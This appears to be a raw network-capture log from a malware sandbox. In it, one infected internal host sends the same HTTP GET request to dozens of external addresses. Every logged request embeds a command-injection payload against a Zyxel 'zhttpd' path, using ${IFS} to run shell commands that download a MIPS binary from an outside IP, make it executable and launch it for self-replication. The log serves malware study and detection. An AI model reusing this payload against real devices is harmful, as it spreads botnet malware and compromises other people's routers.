                                      Jan 19, 2024 17:29:24.615832090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2510192.168.2.1457872159.138.119.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615873098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2511192.168.2.143465432.24.162.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615928888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2512192.168.2.143653479.43.120.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615972042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2513192.168.2.144451420.21.1.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.615994930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2514192.168.2.1440952223.6.92.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616053104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2515192.168.2.1443332143.199.29.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616082907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2516192.168.2.144917892.168.12.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616108894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2517192.168.2.145766295.209.193.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616142035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2518192.168.2.1439670114.100.216.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616193056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2519192.168.2.1447182170.136.105.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616228104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2520192.168.2.1442222221.99.245.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616275072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2521192.168.2.145115485.38.59.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616318941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2522192.168.2.146027089.115.71.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616344929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2523192.168.2.1459924146.7.138.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616375923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2524192.168.2.1459142150.62.144.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616426945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2525192.168.2.144335864.192.56.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616460085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2526192.168.2.1434730207.231.255.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616508007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2527192.168.2.144498483.100.47.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616542101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2528192.168.2.1450378204.204.181.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616580009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2529192.168.2.145507482.20.255.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616628885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2530192.168.2.1454728205.5.19.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616647005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2531192.168.2.143494264.138.82.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616691113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2532192.168.2.144883866.140.121.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616734028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2533192.168.2.1446452138.30.153.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616775036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2534192.168.2.1452746110.255.89.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616806030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2535192.168.2.1446882171.122.252.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616846085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2536192.168.2.14469782.210.87.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616897106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2537192.168.2.1452066154.157.16.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616911888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2538192.168.2.143434668.153.85.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616949081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2539192.168.2.1438544103.160.168.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.616987944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2540192.168.2.1435776167.26.245.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617014885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2541192.168.2.1459420114.158.181.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617044926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2542192.168.2.1453384159.2.245.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617077112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2543192.168.2.1459100191.240.206.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617132902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2544192.168.2.1460374169.115.32.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617168903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2545192.168.2.145859882.207.235.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617187977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2546192.168.2.1459266210.211.224.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617232084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2547192.168.2.144646418.178.4.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617269039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2548192.168.2.144546469.169.216.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617305040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2549192.168.2.1458776132.197.106.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617343903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2550192.168.2.1458336140.28.78.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617384911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2551192.168.2.1442468122.72.179.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617410898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2552192.168.2.1454780159.6.244.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617445946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2553192.168.2.1458404219.42.184.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617482901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2554192.168.2.144408854.105.117.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617518902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2555192.168.2.143714838.14.25.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617547989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2556192.168.2.144934453.153.26.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617597103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2557192.168.2.143506260.135.67.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617644072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2558192.168.2.143890089.96.162.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617677927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2559192.168.2.1442426130.30.4.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617714882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2560192.168.2.1438432197.249.57.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617768049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2561192.168.2.144859888.99.178.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617799997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2562192.168.2.1450082190.205.9.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617824078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2563192.168.2.144710040.217.166.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617883921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2564192.168.2.1447294221.105.39.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617916107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2565192.168.2.1435370136.179.123.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617933989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2566192.168.2.14526869.39.148.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.617980957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2567192.168.2.1450622119.208.253.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618002892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2568192.168.2.1443974103.39.21.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618046045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2569192.168.2.144502267.42.28.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618072987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2570192.168.2.1448262163.2.31.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618140936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2571192.168.2.1439416137.232.196.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618170023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2572192.168.2.143561695.254.51.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.618201017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2573192.168.2.146095446.82.229.247443
                                      TimestampBytes transferredDirectionData
